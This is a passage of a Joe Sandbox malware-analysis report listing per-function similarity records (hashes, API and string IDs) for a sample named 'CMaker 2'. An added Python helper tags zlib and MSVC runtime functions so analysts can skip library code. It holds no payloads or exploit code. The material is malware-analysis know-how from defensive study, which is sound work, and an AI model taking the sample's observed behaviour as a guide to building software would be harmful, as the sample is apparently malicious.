                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                  • API String ID: 0-1127688429
                                                                                                                                                                                  • Opcode ID: 1d902e8f901c38a96aeb86b43eb5ceac74d2cfcee7f470a0dea70dadb94eeeae
                                                                                                                                                                                  • Instruction ID: 1f275499f9c94d0dccef4509fd23f4b81891eea8dd57abf00461738a4d02da2d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d902e8f901c38a96aeb86b43eb5ceac74d2cfcee7f470a0dea70dadb94eeeae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 69F18072A187D58BE7A58B14C0C8A3A7AE9FF46740F4555F8EA69873D0EF38E940C740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                  • Opcode ID: f2e3f23937f2a68c93e747974962f69d529cdec0ec74e941ed306e0113d88ba4
                                                                                                                                                                                  • Instruction ID: 8e09f5b600b5e5876bdbfcc0558973369eba2abbd75c9f5ed0951ce9807a0ef8
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2e3f23937f2a68c93e747974962f69d529cdec0ec74e941ed306e0113d88ba4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DB128B7A04B898AEB15CF29C8863687BB0F784B48F14D961DAADC77A4DF39D451C700
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                  • API String ID: 0-227171996
                                                                                                                                                                                  • Opcode ID: a7bf39730b2c182d9b52e27ba2ba57ef23e99f5aa1b821fca8ab5d1831919a4a
                                                                                                                                                                                  • Instruction ID: f87e0309df4cd3c20d199a72c71196c6f88e3d8ad012c46b44553ebb01f0c6b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7bf39730b2c182d9b52e27ba2ba57ef23e99f5aa1b821fca8ab5d1831919a4a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CE1B57AA0864682EB69CE65845013D33A0FF46B48F9C5279DE7E8B7D4EF29E851C700
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: incorrect header check$invalid window size
                                                                                                                                                                                  • API String ID: 0-900081337
                                                                                                                                                                                  • Opcode ID: bc24f6c5e24477ccd4c15fe8def47b66156c7834ca1ef16c1479b41b30bebea5
                                                                                                                                                                                  • Instruction ID: 46bd9e3891257424e51a63e7d0908b71614ba45432898b900638d2d9d7e6cf73
                                                                                                                                                                                  • Opcode Fuzzy Hash: bc24f6c5e24477ccd4c15fe8def47b66156c7834ca1ef16c1479b41b30bebea5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6891C972A186D687E7A58B14D4C8A3E3AADFF46340F5141F9DA69C67D0EF38E544CB00
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                                                                  • Opcode ID: bfe0f1466ff7f7ecb7ec295dd737c4642cfb5e3859abd1c999ff2cb22516b14b
                                                                                                                                                                                  • Instruction ID: 3fac722f079775621a1b12ac5762cf100c0c8e9130aec8ab27583cdb86a128ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe0f1466ff7f7ecb7ec295dd737c4642cfb5e3859abd1c999ff2cb22516b14b
                                                                                                                                                                                  • Instruction Fuzzy Hash: E551893AB182C546E7248F7598007697B91E756B98F8CC279CB7887AC5EF3DD0418700
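
Several of the function records above are recognisable library code rather than the sample's own logic: "header crc mismatch", "unknown header flags set", "incorrect header check" and "invalid window size" are zlib's inflate error messages; "gfff" is the little-endian byte form of 0x66666667, the reciprocal constant compilers emit for division by 10, and "e+000" is the three-digit exponent template MSVC uses for %e formatting; memcpy_s and _clrfp are CRT helpers; and the API bag of the first record (current process/thread, system time, performance counter) is consistent with the MSVC security-cookie initializer. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in the format shown on this page and tags functions with such fingerprints so an analyst can skip them during triage. The fingerprint tables are this example's own heuristics, and the embedded input is copied from the records above with whitespace trimmed and the hash fields not needed for triage omitted.

```python
"""Triage helper for Joe Sandbox IDA-plugin 'Similarity' records.

Parses the per-function records (one per 'Memory Dump Source' block) and tags
functions whose API or string fingerprint matches well-known library code
(zlib inflate, MSVC CRT). Added example, not part of the Joe Sandbox report;
the fingerprint tables are this example's own heuristics.
"""
import re
from dataclasses import dataclass, field

# Constructed input: five records copied from the report, whitespace trimmed,
# hash fields not needed for triage omitted.
SAMPLE_REPORT = """\
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• Opcode ID: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
APIs
Memory Dump Source
Similarity
• API ID: memcpy_s
• String ID:
• Opcode ID: 57a8bb62846f71c15516153ffb7b4828fa003a6834a4406426bc392e6d140f03
Strings
Memory Dump Source
Similarity
• API ID:
• String ID: $header crc mismatch$unknown header flags set
• Opcode ID: 1d902e8f901c38a96aeb86b43eb5ceac74d2cfcee7f470a0dea70dadb94eeeae
Strings
Memory Dump Source
Similarity
• API ID:
• String ID: $
• Opcode ID: a7bf39730b2c182d9b52e27ba2ba57ef23e99f5aa1b821fca8ab5d1831919a4a
Strings
Memory Dump Source
Similarity
• API ID:
• String ID: e+000$gfff
• Opcode ID: bfe0f1466ff7f7ecb7ec295dd737c4642cfb5e3859abd1c999ff2cb22516b14b
"""

# zlib inflate.c error messages: any one of them marks the inflate state machine.
ZLIB_INFLATE_MSGS = {
    "incorrect header check", "invalid window size",
    "unknown header flags set", "header crc mismatch",
}
# Little-endian bytes of 0x66666667 / 0x6666666666666667 (divide-by-10
# reciprocals) plus MSVC's "%e" exponent template: CRT number formatting.
CRT_FORMAT_MARKERS = {"gfff", "gfffffff", "e+000"}
# __security_init_cookie mixes time, process/thread id and performance counter.
# The API ID is a '$'-joined bag of name fragments, so match capitalised words.
COOKIE_INIT_WORDS = {"Current", "Process", "Thread", "Performance", "Counter", "Time"}
# CRT helpers that appear verbatim inside the API ID.
CRT_API_FRAGMENTS = ("memcpy_s", "_clrfp")


@dataclass
class FuncRecord:
    opcode_id: str = ""
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)


def split_ids(value):
    # '$' separates items; a leading '$' and a bare '$' (unprintable strings)
    # both produce empty tokens, which are dropped.
    return [tok for tok in value.split("$") if tok]


def parse_records(text):
    """One FuncRecord per 'Memory Dump Source' block; fields are '• Key: value' lines."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        key, _, value = line.lstrip("• ").partition(":")
        value = value.strip()
        if key == "API ID":
            cur.apis = split_ids(value)
        elif key == "String ID":
            cur.strings = split_ids(value)
        elif key == "Opcode ID":
            cur.opcode_id = value
    return records


def classify(rec):
    """Return a triage label; 'unclassified' means the function still needs a look."""
    strs = set(rec.strings)
    words = set(re.findall(r"[A-Z][a-z]+", "".join(rec.apis)))
    if strs & ZLIB_INFLATE_MSGS:
        return "library: zlib inflate"
    if strs & CRT_FORMAT_MARKERS:
        return "library: CRT number formatting"
    if COOKIE_INIT_WORDS <= words:
        return "library: CRT __security_init_cookie"
    if any(frag in api for api in rec.apis for frag in CRT_API_FRAGMENTS):
        return "library: CRT runtime"
    return "unclassified: analyse"


def triage(text):
    """Map each function's Opcode ID to its triage label."""
    return {rec.opcode_id: classify(rec) for rec in parse_records(text)}


if __name__ == "__main__":
    for opcode_id, label in sorted(triage(SAMPLE_REPORT).items(), key=lambda kv: kv[1]):
        print(f"{opcode_id[:16]}  {label}")
```

Run against the full report text, the unclassified set is the list of functions worth opening in the disassembler; a record whose String ID is only "$" (unprintable strings) deliberately stays unclassified rather than being guessed at.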

Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID: gfffffff
                                                                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                                                                  • Opcode ID: cf4a6b258e0559303b3c475f79c1c5a3bd9e8d2fcac4499dc9c5272fbf1ab9c6
                                                                                                                                                                                  • Instruction ID: ac1d00ff20c934f9ce5616b78e1c36bb941316b54d73b851dcf12351db25e763
                                                                                                                                                                                  • Opcode Fuzzy Hash: cf4a6b258e0559303b3c475f79c1c5a3bd9e8d2fcac4499dc9c5272fbf1ab9c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: A0A15566A0C7C646EB21CF65A0407A97B90AB52B88F488076DFAD877C5FE3DD501C740
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: TMP
                                                                                                                                                                                  • API String ID: 3215553584-3125297090
                                                                                                                                                                                  • Opcode ID: 3d06e942db0d0aa61c0853d5b86f42f8db5e9f4413fd96033572d36b82d3baf6
                                                                                                                                                                                  • Instruction ID: ec863c8426e9cb76446e85a127bc3e935084604d4a1e4f4b209f0511784366f1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d06e942db0d0aa61c0853d5b86f42f8db5e9f4413fd96033572d36b82d3baf6
                                                                                                                                                                                  • Instruction Fuzzy Hash: FA51C419B0824242FB64ABF755151BA52916F42BC4F8C90BDDE2DC77D6FE3CF4025204
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                  • Opcode ID: d9331582f5f8571c5bc5c8c2dd552919138c8d336df64ce569163af01c0c82c8
                                                                                                                                                                                  • Instruction ID: 5655ba7d65433fb2124eaeb63d9e23a3ea5865e706f8bed51c97f1bff9501fce
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9331582f5f8571c5bc5c8c2dd552919138c8d336df64ce569163af01c0c82c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FB09220E07A8AC2EB4C6F15AC8222523B8BF88710FA890B8C01DC13A0EE2C20A54700
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9d646e120a13ed5259010d3bfa98d53ebc97bb5ffc6c5d812d83f09c7f86f498
                                                                                                                                                                                  • Instruction ID: 0d7295e755827ef945b20956f20a11d64a5aa735fea5ee5ffda58cf8b444ea16
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d646e120a13ed5259010d3bfa98d53ebc97bb5ffc6c5d812d83f09c7f86f498
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE1C63AA1824282EB689BA5C14013D67A1FF46B54F9C817DDE3D8B3D9EF39E951C700
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4ad14dd61e253505c5706a66540999842a22657e44419e18468984a2d200ceed
                                                                                                                                                                                  • Instruction ID: 4edb6958f5e58b9a35fbb970a0e9e5c30cd13d38f996db54f64de5d1b3a3a077
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ad14dd61e253505c5706a66540999842a22657e44419e18468984a2d200ceed
                                                                                                                                                                                  • Instruction Fuzzy Hash: EFE1F47AA0864285F7648AA8C55437C2791EF47B44F9C82BDCE6D872D9EF3DE841C740
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0008bd1e1cf4034a66eb42e07a3a65e84d8b36ac551103fbdda68f9474da116d
                                                                                                                                                                                  • Instruction ID: 3af5aa33f50411a870d72b7a75006dc75f635fce21f7e6bfa669e69432ab7a5b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0008bd1e1cf4034a66eb42e07a3a65e84d8b36ac551103fbdda68f9474da116d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83D1C83EA0864246EB68CEA9855027D27A0FF46B48F9C42BDCE2D876D5EF3DD855C340
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3ac8ee90bb6b617b5b319db632e98c0af2178e83a843fb21159c5a1526b6f998
                                                                                                                                                                                  • Instruction ID: c5ad7ca386e7fe117eb504e68459b32b8e9b91f3e534a26b82db8d3565951f5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ac8ee90bb6b617b5b319db632e98c0af2178e83a843fb21159c5a1526b6f998
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC1A6722181E08BD389EB29E4A947A73E1F78A34DBD4406BEB87477C5DA3CE514D710
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e5cfbf483404f57ee8a12ea4d14ed350c4223dc86507dd0048c0f0f8d20af82
• Instruction ID: a3b6d155d88739935d3f9c2fac025dbd75ab1682d250e9355e28b51ad3c780cd
• Opcode Fuzzy Hash: 3e5cfbf483404f57ee8a12ea4d14ed350c4223dc86507dd0048c0f0f8d20af82
• Instruction Fuzzy Hash: 07B18B7AA0864685E7648F79E05027D3BA0EB46B48F9C45BDCB5E873D9EF39E440CB10
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d13b51d7cebc5a28311f111b9e128a6e63b06b12873bb9f0d627f9558e9a6c03
• Instruction ID: 579de4745d285ed65ff4ffe7a59caee7a6db6c437564cba28b79ae65025a8fc1
• Opcode Fuzzy Hash: d13b51d7cebc5a28311f111b9e128a6e63b06b12873bb9f0d627f9558e9a6c03
• Instruction Fuzzy Hash: EBB1AE7AA0878585E7648F79E05023C3BA0EB4AB48FAC45B9CB5E877D5EF39E441C740
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0bd77ba3b70669da09b487a0ea8a9d1258efaa5b8366dc8ff5dd73dfcf56369
• Instruction ID: 9b3efb420d4fe32524e46270a3ea663f1ded9a3e2f21f9692423c80ce4b2ccef
